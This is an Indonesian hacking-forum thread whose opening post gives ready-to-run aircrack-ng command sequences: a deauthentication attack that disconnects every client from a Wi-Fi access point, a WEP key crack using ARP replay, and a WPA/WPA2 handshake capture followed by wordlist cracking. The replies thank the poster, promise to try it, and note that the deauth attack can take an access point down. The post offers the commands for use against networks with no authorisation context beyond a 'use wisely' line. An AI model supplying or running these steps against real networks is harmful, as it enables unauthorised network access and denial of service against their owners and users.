client turn off
#1
perimisi om-2 brother ogut cuma mo share aja nie.
maav :apn: kalo sedikit repost ato copas dari tetangga. yang pasti bisa berbagi endah Smile
langusng aja yahhh om-2.. dari pada kebanyakan Cool

1. Mematikan seluruh Client

aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a [AP MAC] ath0

2. WEP crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel

* --bssid
* -w [hasil] ath0

new console
aireplay-ng --arpreplay -b [AP MAC] -h [Client MAC] ath0
new console
aireplay-ng --deauth 5 -c [Client MAC] -a [AP MAC] ath0
aircrack-ng hasil*.cap
aircrack-ptw hasil-01.cap

3. WPA/WPA2 Crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel

* --bssid
* -w [hasil] ath0

new console
aireplay-ng --deauth 2 -c [client MAC] -a [Ap MAC] ath0
new console
aircrack-ng -w password.lst [hasil*cap]


Pergunakan dengan arif dan bijak :apn::apn:
sumber

#2
nice info om lau heheheh..
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#3
siap di coba, tp nunggu laptop normal dulu

keyboard nya bandeel bgt
.....................................................
:apn: ~= Share Until Die =~ :apn:
.....................................................

#4
Lumayan nih...tambah ilmu lagi... dicoba dulu ahhhhhh.....

#5
yang no.1 mematikan seluruh client, ga ada obatnya tuh kalo dah diserang pake aireplay-ng..........bisa2 AP down kalo serangannya sampai 12 digit

:beer::beer:

#6
bingung om, tolong di perjelas lagi dunk, maaf sebelumnya :-(
..[BeLajar dan terus belajar agar lebih baIk]..

#7
(07-26-2011, 09:02 PM)gtx150 Wrote: yang no.1 mematikan seluruh client, ga ada obatnya tuh kalo dah diserang pake aireplay-ng..........bisa2 AP down kalo serangannya sampai 12 digit

:beer::beer:

iyah tuh om dah kaya nt waktu live demo Big Grin






Users browsing this thread: 1 Guest(s)